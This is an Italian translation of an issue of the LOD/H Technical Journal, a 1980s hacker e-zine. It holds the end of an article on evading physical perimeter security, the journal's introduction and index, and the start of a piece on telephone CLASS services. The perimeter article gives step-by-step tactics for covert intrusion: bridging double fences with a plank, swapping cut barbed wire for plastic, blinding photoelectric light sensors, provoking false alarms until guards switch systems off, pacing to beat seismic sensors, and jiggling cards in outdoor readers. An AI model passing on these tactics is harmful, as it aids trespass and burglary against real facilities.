* Una rete interna ed una esterna allo stesso tempo

* Filo spinato regolare

* Filo spinato avvolto

* Vari sensori (montati sulla/e rete/i) di rumore o di vibrazioni

* Luci di sicurezza e CCTV (TV a Circuito Chiuso)

* Sensori sismici interrati e diversi sistemi fotoelettrici o a microonde


Reti:
-----

Le reti vengono comunemente usate

  
per proteggere il perimetro. La rete oggi in
uso piu' comune e' la 'rete ciclone', meglio conosciuta come 'rete collegamento
a catena'. Le reti vengono usate come deterrenti per prevenire l'attraversamento
del perimetro. Comuni modi di eludere le reti sono tagliandole, arrampicandocisi
sopra, e scavare al di sotto. Non si raccomanda molto di tagliare nel caso di
entrate furtive, dal momento che si nota facilmente. In questo articolo usero'
l'approccio 'stealth'. Di solito ci si arrampica sempre, ma la rete e' in piena
vista, non e' quindi consigliabile dato che ti possono vedere facilmente. Piu'
alta e' la rete, piu' tempo ti ci vuole per arrampicarti. Piu' tempo ti ci vuole
per arrampicarti, piu' tempo avra' la sicurezza per vederti e reagire. E' meglio
scavare dal momento che sei piu' vicino al terreno, difficile da vedere, ma la
rete deve essere molto flessibile, od il terreno molto morbido in modo che tu
sia in grado di passare sotto la rete facilmente e velocemente. Se mai ti trove-
rai davanti ad una rete dove non puoi arrampicarti (o dove non vuoi arrampicar-
ti), dovresti controllare se lungo il perimetro ci sono grandi alberi con rami
non tagliati che pendono al di la' del perimetro od altri oggetti che ti permet-
teranno di entrare senza nemmeno toccare la rete. Potresti usare una scala ma
non vuoi lasciarti dietro nulla, specialmente con le tue impronte sopra, non
che tu stia tramando qualcosa di illegale naturalmente.

Reti elettriche non sono piu' usate a fini di sicurezza come lo erano in passa-
to. Oggi, il loro uso primario e' per tenere gli animali a distanza dal perime-
tro (sia dall'interno che dall'esterno). Ci sono apparecchiature che inviano
una corrente a basso voltaggio lungo la rete e sono in grado di rilevare una
caduta di tensione quando qualcuno la afferra. Di nuovo, non sono molto comuni
quindi non mi occupero' dell'argomento.

Per le installazioni di alta sicurezza, ci possono essere 2 reti. Una piu'
esterna ed una piu' interna che distano piu' o meno 5-10 yarde. Raramente ti
troverai davanti a questo tipo di protezione, e' principalmente usato dagli
enti governativi o militari. Puoi stare sicuro che ci sono vari sistemi di ri-
levamento dell'intrusione montati sulle reti, interrati o giacenti fra di esse
od altri sistemi a microonde o fotoelettrici. Di questi ultimi parleremo dopo.
Se hai davvero intenzione di penetrare il perimetro dovresti misurare la di-
stanza esatta fra le due reti. Ora procurati un asse di 2 per X piedi dove X
e' la distanza fra le due reti. Molto lentamente posiziona l'asse sopra alle
due reti. Se non ci sono sensori di vibrazione montati devi solo scavalcare e
camminare sull'asse. Altrimenti devi procurati una scala che non tocchi la rete
per salire sull'asse. Poi camina lungo l'asse e salta giu', ma attento a non
muovere troppo le reti. Questo funzionera' se non ci sono installati sensori al
di la' delle reti. Piu' tardi vi diro' come rilevarli. Ovviamente il metodo di
usare un'asse da mettere in cima alle reti non servira' nel caso le reti siano
eccessivamente distanti. Inoltre puoi esere visto facilmente.


Filo Spinato:
-------------

Ci sono due tipi di filo spinato diffusi al giorno d'oggi. Il piu' comune ed il
meno sicuro e' quello teso lungo la rete in tre o piu' fili. Le spine distano
circa sei pollici, abbastanza per lasciarti mettere la mano in mezzo. Inoltre,
e' abbastanza fine quindi tagliabile facilmente. Se dopo hai intenzione di anda-
rtene di corsa o stai progettando un irruzione che non dia problemi e l'unica
via d'uscita e' riscavalcare la rete, puoi tagliare il filo da un palo all'al-
tro, assumendo che sia legato o saldato ad ogni palo, e sostituirlo con un filo
di plastica simile a quello che hai appenza tagliato. Legalo ad entrambi i pali
e potrai ritornare quando vuoi. Cosi' puoi arrampicarti di nuovo senza taglia-
rti. L'altro tipo di filo, piu' sicuro o pericoloso a seconda dei punti di vista,
e' un filo arrotolato circolarmente comunemente chiamato il Nastro Rasoio. Una
societa' che lo produce e' l'American Fence Co. che lo definisce 'la roba eff-
icace'. E lo e'. Le spine sono affilate come rasoi. Naturalmente si puo' taglia-
re, ma avrai bisogno di taglia-fili molto forti ed una volta che l'avrai taglia-
to, allontanati subito il piu' che puoi per evitare che ti spari in faccia. Come
ho detto prima, una volta tagliato e' irreparabile, ed ovvio. Se il filo non e'
arrotolato fitto, puo' darsi che ci sia dello spazio sufficiente per passarci
attraverso senza ferisi e perdere molto sangue. Se il filo e' arrotolato fitto,
puoi provare a coprirlo con del materiale resistente come strati di cuoio, in
modo da scavalcarlo senza farti male. Comunque non e' facile. Meglio cercare di
passare sotto scavando oppure di saltare sopra la rete senza scavalcarla.


Sensori di rumore o vibrazione montati sulle reti
-------------------------------------------------

Mettiamo che hai trovato il modo per oltrepassare la rete. Naturalmente non lo
hai ancora fatto, dato che dovresti pianificare tutto prima di agire. OK, hai
pianificato come teoricamente superare la rete. Ora hai passato lo stadio de-
terrente e quello preventivo. Prima di mettere il piano in azione, faresti me-
glio a controllare le cose di cui ti ho parlato prima. Se una rete e' il primo
passo verso la difesa di sicurezza, il secondo passo sono i sensori sulla rete.
I tipi di apparecchiature di rilevamento che possono essere montate sulla rete
sono:

Sensori di muovimento: Questi vengono montati sui pali della rete ad intervalli
dai dieci ai trenta piedi o su ogni palo. Sono scatolette attaccate a circa 2/3
del palo da terra. C'e' un cavo, twistato o coassiale, che corre orizzontalmente
lungo la rete che connette le scatole. Puo' essere difficile trovare il cavo pe-
rche' puo' essere fatto passare in canaline o addirittura dentro la rete. Ogni
sensore della rete consiste in un rilevatore di shock sismico che rileva se si
sta scavalcando, se si sta scavando/sollevando o tagliando la rete. Cosi' se e'
possibile scavalcare la rete si consiglia di non farlo perche' si verra' scope-
rti. Naturalmente non importa se tu vieni scoperto e non ci sono forze di sicu-
rezza pronte ad acchiapparti.

Un altro tipo, viene chiamato cavo E-Flex. E' un semplice cavo coassiale che
corre orizzontalmente lungo la rete. Non viene usato solo per le reti ma anche
per barriere solide a blocchi concreti, mattoni o altre. Puo' trovarsi all'este-
rno, o montato all'interno della rete in modo da renderlo quindi difficilmente
rilevabile. Naturalmente non e' impossibile rilevare questo ed altri tipi di ap-
parecchiature che non si vedono a prima vista. Un modo per accorgersene e' qello
di semplicemente colpire ripetutamente il muro/rete con un oggetto pesante op-
pure tirandogli pietre. Se non succede nulla di straordinario, allora puoi es-
sere abbastanza sicuro che non ci sia. Fondamentalmente e' un sensore di vibra-
zioni.

Microfoni a bassa frequenza: Essenzialmente si tratta di un cavo coassiale che
reagisce al rumore trasmesso all'interno della stessa rete.

Sensori di vibrazioni: Sono basati su interruttori a mercurio, un anello od una
pallina su di uno spillo, o una pallina su un binario. Il movimento della rete
disturba gli interruttori e segnala un'allarme. E' chiaro che questi vengono
usati solo su reti parecchio stabili senza gioco o movimento. Altrimenti gli in-
terruttori daranno falsi allarmi come pazzi :)

OK, sai tutto di queste apparecchiature, come puoi eluderle ? Be, non toccare
la rete. Ma se non c'e' alternativa, e devi scavalcare, allora fallo dove la re-
te fa una curva a 90› gradi (l'angolo) o al cancello. Arrampiacti molto lenta-
mente ed attentamente e dovresti riuscire a salire senza che i sensori ti veda-
no! Assicurati di arrampicarti lungo il tubo piu' largo e di non cadere.


Luci di sicurezza e CCTV:
-------------------------

Qualche volta le reti possono essere dotate di TV a Circuito Chiuso (CCTV) per
monitorare il perimetro piu' facilmente e velocemente. Installando sistemi di
illuminazione adeguati e telecamere normali, od usando speciali telecamere sen-
sibili alla luce bassa, si puo' tenere d'occhio il perimetro da un punto di con-
trollo centrale. E successivamente dislocare il personale di sicurezza quando si
rilevera' un intruso sui monitors.

Alcuni sistemi sono stazionari, altri possono muoversi per tenere sotto control-
lo aree different. Dovresti prima determinare se il sistema e' satico o no. Nel
caso non lo sia si puo' pianificare un tragitto che sia fuori dal campo di vista
delle telecamere. Avrai quindi delle opportunita' se il sistema e' mobile.

Sensore del controllo luci: Questo utilizza un sensore ad Infrarossi Passivi
(PIR) per rilevare il calore emesso dal corpo di qualcuno che cerca di entrare
nell'area sorvegliata, e puo' accendere una luce od un altro allarme. Discute-
ro' dei PIR nella parte II di questa serie. Il sensore e' dotato di un'opzione
chiamata: "modalita' notturna" in cui si accendera' una luce quando una persona
cerchera' di entrare, ma solo durante le ore notturne. Capisce se e' notte o
giorno grazie o ad un orologio o ad un sensore fotoelettrico. Naturalmente qua-
ndo le giornate si accorciano, l'orologio non e' sempre accurato, quindi lo puoi
sfruttare a tuo vantaggio. Se e' fotoelettrico, puoi semplicemente posizionare
durante il giorno un faretto che punta dritto sul sensore. Quando fara' buio, il
sensore pensera' che sia ancora giorno data luce che rileva e quindi non attive-
ra' l'unita' in modo che rilevi segnali d'allarme. Questo dovrebbe permetterti
di muoverti liberamente nell'area.


Sensori sismici interrati:
--------------------------

I rivelatori sismici servono a rilevare un intruso captando il suono dei suoi
passi od altri suoni che si possono provocare durante il passaggio nell'area
protetta. Questi sensori hanno un raggio d'azione di circa 20 piedi e vengono
interrati e collegati da un cavo che trasporta i segnali fino ad un processore.
Qui, i segnali vengono amplificati ed equalizzati per eliminate le frequenze che
non c'entrano con il muovimento dell'intruso. I segnali vengono convertiti in im-
pulsi che vengono a loro volta confrontati con una soglia di tolleranza. Ogni
impulso che supera la soglia viene controllato per numero e frequenza. Se cor-
risponde ai parametri di un passo, viene fatta suonare un'allarme. Questi senso-
si possono anche seppellire sotto l'asfalto tagliando un solco nel materiale.
Sono anche immuni al tempo e possono giacere sotto tutti i tipi di terreno. L'
unica limitazione e' che la zona di rilevamento deve essere priva da alcun tipo
di ostacolo tipo alberi o cespugli.


Sensore di campo elettrico:
---------------------------

Questi rilevano un intruso misurando un cambiamento in un campo elettrico. I
sensori di campo usano un set di due cavi, uno con dei buchi sulla schermatura
del cavo per permettere al campo elettrico di disperdersi nell'area circostante.
L'altro cavo e' un ricevitore che rivela il campo e elettrico e tutti di cambia-
menti che vi avvengono. Gli oggetti che passano nel campo lo distorcono, facendo
scattare un'allarme. Il sensore puo' sia essere interrato, sia posizionato in
verticale, e puo' trovarsi in ogni tipo di terreno. Esso e' pero' molto sensibi-
le agli animali, al pulviscolo trasportato dal vento, qundi, se c'e' molto vento
e sai che ci sono questi sensori, procurati della carta e lasciala trasportare
dal vento in modo che attivi l'allarme ripetutamente. Se lo fai abbastanza volte
probabilmente la spegneranno o la ingnoreranno a causa dei troppi falsi allarmi.

Non e' difficile capire che, se ci sono questo tipo di apparecchiature, non le
puoi vedere, ma non ne hai bisogno. Prendi semplicemente 3-4 pietre di media
grandezza. Lanciale verso il posto dove pensi si trovino i sensori. Ripeti di-
verse volte. Questo funziona sui sistemi meno avanzati che non sono in grado
di distinguere questo tipo di attivita' sismica dal correre/camminare umano. Se
non accade nulla, puoi stare quasi certo che non c'e' nessun sensore. Ora che
sai come trovarli, in che modo eluderli ? Beh per quanto riguarda i sensori
elettromagnetici, dovresti aspettare una notte ventosa e causare falsi allarmi
finche' non disattiveranno l'allarme. Quando invece ti trovi vicino ai sensori
sismici fai un passo alla volta, dolcemente, un passo ogni circa 30-60 secondi.
I sensori hanno una soglia di tolleranza, diciamo 2 o piu' passi in 30 secondi
faranno scattare l'allarme. Semplicemente fai un passo alla volta, lentamente
e aspetta, finche' arrivi a destinazione. Questi rivelatori si basano sul fatto
che l'intruso non conosca il funzionamento delle apparecchiature e che quindi
corra/cammini normalmente lungo l'area protetta, causando di conseguenze vibra-
zioni sismiche considerevoli. Il problema di questo metodo e' che ti ci vorra'
un po' per attraversare tutta l'area. Questo significa che hai piu' probabilita'
di farti sgamare. Se c'e' molta gente che va e viene dallo stabile, non dovresti
usare questo metodo. Un altro metodo puo' essere quello di correre sull'area
protetta fino alla porta (da cui dovrebbe uscire la sicurezza) e lasciare la'
grande gatto od un cane. Quando usciranno, probabilmente daranno la colpa allo
animale. Il sensore non dovrebbe rilevare un animale piu' piccolo, ma tante sono
le guardie che non conosceranno le capacita' del sensore ed incolperanno l'ani-
male e non te. Sempre che non c'erano telecamere a riprendere...


Sistemi a microonde:
--------------------

In un sistema a microonde esterno, un fascio di energia a microonde viene invi-
ato da un trasmettitore ad un ricevitore in una forma conica. A differenza dei
rivelatori di microonde interni, che rivelano il muovimento di un intruso nel
campo di microonde, il sistema esterno reagisce alla presenza di un intruso ri-
levando la diminuzione di energia nel fascio. I fasci possono proteggere un area
lunga fino a 1500 piedi e larga 40 piedi. La trasmissione e' simile ad uno sgu-
ardo qundi l'area deve essere libera di ostacoli come alberi che possono bloc-
care il fascio. I sistemi a microonde sono in grado di operare col brutto tempo e
non segnaleranno un'allarme dovuta agli uccelli od a pulviscolo.

Questi sistemi lavorano sull'effetto Doppler, in cui rivelano il movimento che
cambia l'energia e fa scattare l'allarme. Queste apparecchiature si trovano di
solito all'interno di una rete per evitare falsi allarmi. Questi sistemi si pos-
sono vedere facilmente. Sono pali alti circa 1-2 yarde, di circa 6 per 6 pollici
e ce ne sono due, un ricevitore ed un trasmettitore. In alcuni casi ce ne saran-
no di piu' e saranno in grado quindi di proteggere un'area piu' estesa.

Per eluderli devi entrare nel campo molto lentamente, facendo un passo alla vo-
lta e muovendoti come a rallentatore. Non importa quanto forte colpisci il ter-
reno, dal momento che non rivela l'attivita' sismica, solo a che velocita' ti
avvicini al campo. Se lo fai molto lentamente potrai essere in grado di evitar-
lo. Ricordati che questi tipo di sensori sono piu' sensibili piu' ci si avvici-
na. Ergo, scegli un percorso che ti conduca lontano dai pali.


Sistemi fotoelettrici:
----------------------

Questi sistemi si basano su una barriera invisibile creata da fasci di luce in-
frarossa inviada da una sorgente di luce ad un ricevitore. Quando si interrompe
il fascio l'allarme viene fatta scattare. Il fascio puo' avere un raggio d'azio-
ne effettivo di 500 piedi. Fasci multipli possono essere usati per aumentare la
sicurezza del sistema, rendendo difficile passarvi sopra o sotto. I sistemi fo-
toelettrici sono soggetti a falsi allarmi a causa di uccelli od oggetti traspo-
rtati dal vento. Si puo' risolvere il problema installando un sistema che ri-
chieda che il fascio venga interrotto a lungo per attivare l'allarme. Le condi-
zioni meteorologice come la nebbia fitta possono interrompere il fascio e causa-
re qundi un'allarme. Anche a questo si puo' riparare installando un sistema che
reagisce alla perdita graduale di segnale. Inoltre questi sistemi non devono
essere esposti direttamente alla luce del sole che tramonta/sorge perche' anche
in questo caso si avra' l'interruzione del fascio.

Come puoi notare, questo sistema presenta vari problemi che puoi sfruttare per
eluderlo. Come con ogni sistema bisogna sorvegliare il sistema in particolari
condizioni climatiche per verificare la presenza dei detti sistemi e per vedere
quali tipi di falsi allarmi causano. Molte volte sarai in grado di sfruttare
certe situazioni meteorologiche per compiere la tua missione. Se c'e'solo un set
di apparecchiature (trasmettitore e ricevitore), cerca di calcolare la distanza
di esse dal suolo. Poi potrai decidere se passare sotto il fascio o saltarlo.
Anche questo apparecchio si basa sul fatto che l'intruso non conosca come fun-
zioni.


Varie:
------

Le guardie: Ci sono due tipi di guardie, interne o pagate dalla compagnia e le
guardie di contratto. Le guardie di contratto sono meno sicure dal momento che
non lavorano per lo stabile e se fanno un errore vengono trasferite da un'altra
parte e basta. Le guardie interne conoscono meglio lo stabile ed hanno di piu'
da perdere, quindi sono probabilmente piu' conscie circa la sicurezza. Stai at-
tento alla ronda lungo il perimetro che le guardie faranno per ispezionarlo vi-
sivamente.

Monitoraggio centrale: Il monitoraggio dei sistemi menzionati in quest'articolo
viene di solito eseguito in una postazione centrale all'interno dello stabile.
Di solito le guardie *DOVREBBERO* tenere d'occhio la situazione. Se hai piani-
ficato bene, puoi aver scoperto che la guardia lascia la postazione per fare
certe cose alla stessa ora tutte le notti. In quest'intervallo di tempo dovresti
fare tutto quello che puo' essere visto da telecamere. Sfortunatamente, ci sara'
probabilmente piu' di una guardia al posto di controllo rendendo l'impresa quasi
impossibile.

Cancelli: Probabilmente la via piu' facile da cui entrare e' passare dai cancel-
li. In una macchina o camminando. Non sara' facile se e' sorvegliato o c'e' un
lettore di pass per entrare.

Lettori di pass esterni: Ci sara' una profonda trattazione dei tipi di pass usa-
ti per entrare nella terza parte della serie. Ma per ora, se la tessera usata e'
magnetica, e' possibile eludere il sistema. Se hai una VISA od altre tessere
magnetiche, faccela passare attraverso, muovila, scuotila ecc. ecc. e forse il
cancello si aprira'. Il perche' e' semplice: dal momento che si trova all'este-
il lettore e' soggetto a condizioni di tempo estreme ogni giorno, quindi le te-
stine possono non funzionare sempre correttamente, o il circuito non lavorare
come dovrebbe, facendo 'errori' che ti permetteranno di entrare.

Combinazioni: Le apparecchiature elencate in questo articolo non devono per
forza essere usate da sole. Possono e sono usate insieme con altri mezzi per
rafforzare la sicurezza.

Diversivi: In alcuni casi, un diversivo puo' assicurarti un passaggio sicuro
attraverso il perimetro. Ricordatelo.

Condizioni meteorologiche estreme: Tutte le apparecchiature hanno una fascia
di temperature in cui possono operare. Nella parte bassa della scala, la mag-
gior parte dei sistemi non operano sotto i -30 F›. Inoltre presentano un'atti-
tudine a non funzionare correttamente anche a -13 F, -4 F, +10 F, +32 F. Nella
parte alta della scala non opereranno sopra: +120 F, +130 F e +150 F. E' poco
probabile che la temperatura esterna salga sopra i +120 F, ma in parecchi posti,
puo' gelare. Prendi queste possibilita' in considerazione se uno stabile presen-
ta questi sistemi e non riesci ad eluderli in altri modi.

Sicuramente non avro' menzionato tutto cio' che viene usato per la protezione
del perimetro in questo articolo. Ho cercato di informarti sui mezzi piu' comu-
nemente usati. Alcune cose sono state escluse intenzionalmente, altre no. Ac-
cetto tutte le correzioni, i suggerimenti e i metodi per quest'articolo ed i
futuri gia' in programma. Potete contattarmi tramite lo 'Staff Account' LOD/H.


CONCLUSIONE:
------------

Quest'articolo e' incentrato primariamente sull'identificazione degli 'attrez-
zi' usati nel campo della sicurezza fisica per la deterrenza, prevenzione, ri-
levamento e reazione nei confronti di un intruso. Ci sono anche altri metodi che
sono stati usatti per eludere questi 'attrezzi'. Nessuno dei metodi menzionati
funziona al 100% in tutte le circostanze, ma TUTTI hanno funzionato, alcuni in
circostanze controllate, altri no. Ma hanno tutti funzionato. Alcuni metodi pos-
sono sembrare ortodossi, ma fanno il loro lavoro. Alcuni metodi non sono stati
intezionalmente menzionati per ovvie ragioni. Sebbene quest'articolo sembri una
sorta di guida, in nessun modo ti sto dicendo ti infrangere le leggi. Ti sto
solamente mostrando come riconoscere apparecchi di cui non sapevi l'esistenza
ed evitarti quindi di essere catturato. Il sistema non gioca sempre pulito,
allora perche' noi dovremmo ?


RICONOSCIMENTI:
---------------

Gary Seven (LOH)
NightWolf (UC)

>> ha collaborato con NightWolf nella traduzione Li-Nux , con altri txt sempre<<
>> made in LoD !!!!!<<

NightWolf

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Indice LOD/H Numero 1] UnDeR CoNsTrUcTiOn ³
³ [MiSc SeCtIoN] Articolo di: NightWolf ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

LOD/H TECHNICAL JOURNAL
-----------------------


INTRODUZIONE:


Benvenuto al primo numero del TJ LOD/H!

Il TJ LOD/H e' un giornale software gratuito il cui primo obiettivo e'
quello di aumentare le conoscenze di quelli che sono interessati in argomenti
del tipo: Telecomunicazioni, Datacomunicazioni, Computer & Sicurezza/Insicu-
rezza Fisica ed i vari aspetti tecnici del sistema telefonico.

Gli articoli contenuti qui dentro, sono esclusivamente originali a
meno che non sia specificato diversamente. Tutte le sorgenti di informazione
di un articolo sono elencate nell'introduzione o nella conclusione dello
stesso. Non accetteremo articoli non originali, modificati, o contenenti in-
formazioni invalide o false. Accetteremo articoli da tutti quelli che rispet-
teranno i precedenti criteri, dal momento che i membri della LOD/H ed un
ristretto gruppo di altri saranno i primi che contribuiranno, ma chiunque
puo' mandare articoli.

Incoraggiamo i lettori a scaricare tutti i files di ogni numero, non
solo quelli che interessano loro. Ci sono due motivi per questo: il giornale
e' ritenuto uno sforzo collettivo, quindi i files contenutivi non sono pensati
per essere distribuiti individualmente, secondariamente, mantenere il numero
intatto ti permettera' di distribuirlo al altre BBS ed amici a cui interessa.

Non c'e' data precisa per il rilascio dei numeri, dal momento che non
abbiamo obblighi monetari o legali nei confronti dei lettori, prevediamo che
i numeri seguenti saranno rilasciati in 2 o 3 mesi da quello precedente.
Quindi aspettati dai 4 ai 6 numeri l'anno sempre che continuiamo a produrli,
come comunque abbiamo intenzione di fare.

Gli sponsors del giornale riceveranno il giornale direttamente dallo
staff appena verra' rilasciato ed inoltre e' stata aggiunto uno 'staff account'
alla lista degli utenti per fari si' che i lettori possano risponderci diret-
tamente circa il contenuto del giornale. Se anche tu vuoi entrare a far parte
degli sponsors, mandaci una mail su uno qualunque degli sponsors seguenti:

Atlantis
Metal Shop Private
Private Sector
Digital Logic
Hell Phrozen Over

Lo 'staff account' del LOD/H TJ e' su tutte le BBS dei nostri sponsors.
Questo permette ai lettori di contattarci per le ragioni seguenti:

* Se si hanno domande circa gli articoli, o la validita' del materiale, si e'
liberi di contattarci tramite lo 'staff account' e lasciare all'autore un
modo per contattarvi. Questo assicura una migliore comprensione dei lettori
dell'argomento ed inoltre assicura l'integrita' dell'autore come conoscenza
ed originalita' nell argomento trattato.

* Si possono lasciare domande per lo staff a cui verra' risposto nella sezio-
ne 'Ask The Staff' del giornale. Le domande riportate saranno di interesse
generale o altro. Cercheremo di rispondere via E-Mail a tutte le domande a
cui non verra' data risposta nel giornale. Non sappiamo ogni cosa, ma tutto
quello che sappiamo lo condivideremo con chi chiede.

Varie caratteristiche del giornale includono:

Editoriali: Brevi articoli che riguardano il mondo delle telecomunicazioni in
generale.

Appunti & Notizie di Rete: Articoli ed altre cose associati agli argomenti
trattati nel giornale.

Posta dei Lettori: Domande e commenti sui numeri precedenti dai lettori che
ci contattano tramite lo staff account sugli sponsors.

Speciali: Non saranno presenti tutte le volte e potranno essere qualsiasi cosa
che non rientri nel formato generale del giornale.

-------------------------------------------------------------------------------

INDICE:

01 Introduzione al LOD/H Technical Journal Staff 05 K
Indice del Volume 1, Numero 1

02 Custom Local Area Signalling Services (CLASS) The Videosmith 17 K

03 Identificare ed evitare la sicurezza fisica ed i Lex Luthor 23 K
Sistemi Rilevamento Intrusione Parte I: Il Perimetro

04 Il Traffic Service Position System (TSPS) The Marauder 23 K

05 Introduzione all Hacking del TOPS-20s Blue Archer 19 K
della DEC

06 Costruisci la tua Blue Box (Include Schema) Jester Sluggo 16 K

07 Intelligenza e Processi di Interrogazione Master Of Impact 18 K

08 L'Impianto Esterno di Distribuzione
di Ciclo: Parte A Phucked Agent 04 25 K

08 L'Impianto Esterno di Distribuzione
di Ciclo: Parte B Phucked Agent 04 23 K

10 LOH Telenet Directory: Aggiorn. #4 (1-1-87) Parte A LOH 25 K

11 LOH Telenet Directory: Aggiorn. #4 (1-1-87) Parte B LOH 18 K

12 Notizie & Note di Rete Staff 10 K


Totale: 12 files 223 K

-------------------------------------------------------------------------------

Cosi' finisce l'introduzione, speriamo che ti piaccia ed aspettiamo che ci
contatti.

-> Tradotto Da NightWolf [Under Construction]
-> Sezione Italiana LOD/H

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Custom Local Area Signalling Services] UnDeR CoNsTrUcTiOn ³
³ [PhReAkInG SeCtIoN] :) Articolo di: NightWolf ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Scritto da: The Videosmith

Versione - 1.1

----------------------------(c) Copyright 1994---------------------------

Questo articolo spieghera' il nuovo sistema LASS (AT&T Bell Labs)
sviluppato, e come ci riguardera' da vicino in un futuro prossimo. Nota che
il servizio per gli utenti e' chiamato "CLASS", la 'C' sta per 'Custom'.

LASS
----

Il telefono era destinato a diventare un ben usato e potente strumento per
compiti altrimenti laboriosi. I contatori del gas ed altri servizi a conta-
tori saranno controllati recuperando i dati automaticamente tramite comuni-
cazione telefonica. Alcuni hanno grandi progetti per gli usi che si possono
fare del sistema telefonico, e il CLASS e' un progetto che fara' da bomba
innovativa sul mondo delle telecomunicazioni.

Attualmente, i Bell Laboratories stanno sviluppando una componente locale
della rete CCIS. Questa componente cambiera' il modo in cui la gente usera'
il telefono e l'atteggiamento con cui lo faranno. Dara' molto piu'controllo
del telefono all utente, come mai in precedenza. Questa componente si chiama
CLASS (Custom Local Area Signalling Services).

Ognuno trovera' qualcosa di utile in questa nuova componente telefonica
sviluppata. Le pizzerie non dovranno piu' preoccuparsi dei commercianti di
cibo Italiani fraudolenti, e le vecchiette non si dovranno preoccupare degli
scherzi telefonici da certi individui dubbi.

Quali sono tutte queste fantastiche componenti? Queste includeranno la
richiamata dell'ultimo numero chiamante, che lo si conosca o no. Un'altra
caratteristica saranno toni di attesa di chiamata distinti ed inoltro
chiamata preselezionato (sarai chiamato solo dalle persone con cui vuoi
parlare). Questa e' solo una lista rudimentale di caratteristiche del CLASS
che saranno implementate. E' un sistema molto potente che si basa sul LCCIS
(Local Common Channel Interoffice Signalling), una versione intra-LATA del
ben conosciuto CCIS.

Precedenti del CCIS
-------------------

Il CCIS e' stato originalmente introdotto nel 1976 come, basilarmente, il
sistema di segnalazione per terminare tutti i sistemi di segnalazione.
Invece di usare i trunks vocali per trasportare l'informazione di
segnalazione, venne usata una rete di dati. Quella rete comprende
collegamenti dati da ogni TO [riguarda il CCIS] all'appropriato STP (punto
di trasferimento della segnalazione). L'informazione di segnalazione viaggia
a 4800 bauds in questi collegamenti fino agli STPs (Nota che i bauds
aumenteranno in base alla disponibilita' economica dell'hardware di
comunicazione piu' veloce), dove il programma di controllo memorizzato
instrada l'informazione della segnalazione agli uffici necessari al fine di
aprire e completare il percorso della chiamata. SPC controlla
automaticamente lo stato del telefono agganciato/non-agganciato prima di
aprire il percorso, e se lo stato risulta non-agganciato (in questo caso
l'utente non ha il servizio di attesa di chiamata), ritorna informazioni al
CO originante di attivare un segnale di occupato all utente. Questa e' uno
dei tanti servizi che il CCIS offre alla rete.

Siccome questo testo non e' incentrato sull'argomento del CCIS della ta-
riffa, gli aspetti tecnici non cosi' importanti (eccetto per il confronto
fra reti locali e di tariffa a fine descrittivo): e' pero' importante
accorgersi quando automatizzato e flessibile questo tipo di metodo di
segnalazione risulti, come la sua velocita' ed efficienza. Tutto il
controllo software che ha a che fare con la rete locale o di tariffa e'
chiamato "stored program control network" o ISDN (Integrated Services
Digital Network). Parleremo del LCCIS in un articolo futuro.

Caratteristiche del CLASS/LCCIS
-------------------------------

L'LCCIS appare circa cosi:


/--\
CO-2
ESS#
/----I-T-G-----1A-----I-T-G----\
| \--/ |
| | |
| LCCIS |
| | |
| ---------- |
/--\--LCCIS--|CCIS/SPC|--LCCIS--/--\
CO-1 ---------- CO-3
ESS# ESS#
-1A----interoffice trunk group---1A-
\--/ \--/

SPC = Stored Program Control (Controllo di rete e Punto di Trasferimento del
Segnale)
ITG = Gruppo trunk 'interoffice' (comunicazione tra uffici)

L'uso di connessioni dati ad alta velocita' fra gli uffici locali crea una
via di comunicazione piu' flessibile e piu' efficiente per gli uffici
centrali intra-LATA. Invece di usare la segnalazione per-trunk (ovvero usare
lo stesso trunk usato per la trasmissione vocale per segnalare le
informazioni di instradamento e di applicazione tariffa), i dati verranno
inviati tramite una connessione dati dedicata a 2400 bps, che interagisce
con un punto di trasferimento ed elaborazione del segnale locale. Da quel
punto, l'informazione della segnalazione viene instradata alle appropriate
centrale od ai selettori in sequenza.

Quando ricercavo dati per questo articolo, stavano sviluppando il CLASS
solo per il selettore #1A ESS data la flessibilita' del suo sistema di ge-
stione della memoria, la sua velocita' e cio' che i Bell Labs chiamavano
'efficienza di costo'. Alla fine della ricerca riguardante questo articolo,
il CLASS era gia' stato implementato nello stadio dati sull' ESS#5.

LCCIS interagira' con i selettori locali usando l'SPC, tenendo traccia dei
dati delle chiamate. I selettori 1A faranno uso di cio' che e' chiamato
memoria di "scratch pad" (conosciuta anche come memoria di chiamata), unita
al database dell'LCCIS, per fornire tutti i servizi che il LASS fornisce.
Questa memoria conterra' dati come la "line history" ed una "screening list".
Queste informazioni renderanno possibili la ricomposizione dell'ultimo
numero chiamato, inoltro chiamate selettivo, rifiuto chiamata, e distinti
toni di attesa di chiamata.

CF Selettivo (Call Forwarding ---> Trasferimento di Chiamata)
-------------------------------------------------------------

L'inoltro delle chiamate selettivo viene stabilito dall'iscritto al servi-
zio (l'utente deve avere un inoltro chiamate convenzionale per richiedere
questo servizio). Usando la memoria di chiamata o piu' specificamente la
"screening list", uno sara' in grado di di inoltrare selettivamente una chia-
mata ad un altro numero eseguendo pochi semplici comandi sul telefono fisso
di casa (a differenza dei telefoni che variano nelle stanze degli alberghi).
Un codice di accesso (c'e' una lista a fine file) andra' inserito ed il CO
del chiamante emettera' un tono speciale. Il cliente comporra' poi i numeri
che vuole inoltrare al particolare numero. Dopo ogni numero, si udira' un
tono che indichera' il corretto inserimento del numero. Ogni BOC (Bell
